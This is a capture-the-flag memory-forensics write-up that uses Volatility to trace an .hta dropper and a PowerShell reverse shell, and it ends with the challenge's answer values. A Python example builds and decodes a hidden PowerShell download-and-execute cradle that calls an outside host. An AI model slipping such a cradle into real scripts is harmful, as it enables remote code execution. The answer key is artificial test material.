vol.py -f honeypot.raw imageinfo

After finding out what kind of image we are dealing with, I usually first check to see what processes were running.
vol.py -f honeypot.raw --profile=Win7SP1x86_23418 pslist

We can see some iexplore.exe processes. To be expected, considering a URL was used to download malware. I also see powershell and whoami being run. I'll make a note of that.

Let's see what ports and connections are listening or established, especially since the description asks us to find a process PID.
vol.py -f honeypot.raw --profile=Win7SP1x86_23418 netscan

I made a note of a strange quad-4 port.

Since Santa downloaded malware and the challenge asks us to find a URL, let's check the Internet Exploder history as well.
vol.py -f honeypot.raw --profile=Win7SP1x86_23418 iehistory

I'm always wary of .hta files so this jumped out at me.

So we know iexplore.exe, with PID 3344, was used to download an .hta file.

Let's try to find the file.

vol.py -f honeypot.raw --profile=Win7SP1x86_23418 filescan|grep -i .hta

We find it, so let's dump its contents.

vol.py -f honeypot.raw --profile=Win7SP1x86_23418 dumpfiles -Q 0x3f4d4348 -n "christmas_update[1].hta"

Would you look at that. That looks like a powershell reverse shell. We are on the right track.

Base64 decoding the string, we find it is downloading and executing a file called update.ps1.
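Decoding such a blob programmatically, as an added example that is not part of the original writeup. PowerShell's -EncodedCommand argument is UTF-16LE text that was then base64-encoded, so a plain base64 decode shows every other byte as NUL; the helper below handles that and pulls out any URLs and .ps1 names. The HTA text and its encoded command are constructed here to match what the writeup describes, not the real christmas_update.hta:

```python
import base64
import re
from typing import Optional

# Constructed sample modelled on the HTA dropper described in the writeup: a
# PowerShell download cradle hidden behind -enc. The base64 blob is generated
# inside this script so the sample always decodes; it is NOT the real file.
CRADLE = ("IEX (New-Object Net.WebClient)"
          ".DownloadString('https://windowsliveupdater.com/update.ps1')")
SAMPLE_HTA = (
    '<script language="VBScript">\n'
    'Set s = CreateObject("Wscript.Shell")\n'
    's.Run "powershell.exe -nop -w hidden -enc '
    + base64.b64encode(CRADLE.encode("utf-16le")).decode()
    + '", 0\n</script>'
)

# Longest alias first so "-enc" is not cut short by the "-e" alternative.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)",
                    re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def decode_encoded_command(text: str) -> Optional[str]:
    """Find a PowerShell -EncodedCommand blob in text and return the decoded command.

    Tries UTF-16LE first (what powershell.exe itself produces) and falls back
    to UTF-8 for blobs that were hand-encoded some other way.
    """
    m = ENC_RE.search(text)
    if not m:
        return None
    raw = base64.b64decode(m.group(1))
    try:
        return raw.decode("utf-16le")
    except UnicodeDecodeError:
        return raw.decode("utf-8", errors="replace")


def extract_urls(text: str) -> list[str]:
    """Return every http(s) URL found in the decoded command."""
    return URL_RE.findall(text)


def downloaded_scripts(text: str) -> list[str]:
    """Return the file names of any .ps1 the decoded command fetches."""
    return [u.rsplit("/", 1)[-1] for u in extract_urls(text)
            if u.lower().endswith(".ps1")]


if __name__ == "__main__":
    cmd = decode_encoded_command(SAMPLE_HTA)
    print(cmd)
    print(extract_urls(cmd), downloaded_scripts(cmd))
```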

We can't find the file in memory, though:
vol.py -f honeypot.raw --profile=Win7SP1x86_23418 filescan|grep -i update.ps1

Going back to netscan, we notice a lot of powershell.exe entries with PID 2700. Because a .ps1 reverse shell was downloaded, it would be running under powershell, which has PID 2700. So I dumped the memory of that PID.

vol.py -f honeypot.raw --profile=Win7SP1x86_23418 memdump -p 2700 -D .
And we can see the actual content of the script that was run by powershell.

We have our IP:

Let's put all this information together as the challenge requires.

The URL used to download the malware: https://windowsliveupdater.com/christmas_update.hta
The malicious process PID: 2700
The attacker's IP: 147.182.172.189

Putting it all together it looks like this: https://windowsliveupdater.com/christmas_update.hta_2700_147.182.172.189

However, the flag is supposed to be the md5sum of that.

echo "https://windowsliveupdater.com/christmas_update.hta_2700_147.182.172.189"|md5sum
Original writeup (https://github.com/LazyTitan33/CTF-Writeups/blob/main/HTB%20-%20Cyber%20Santa%20is%20Coming%20to%20Town%202021/Forensics/Honeypot.md).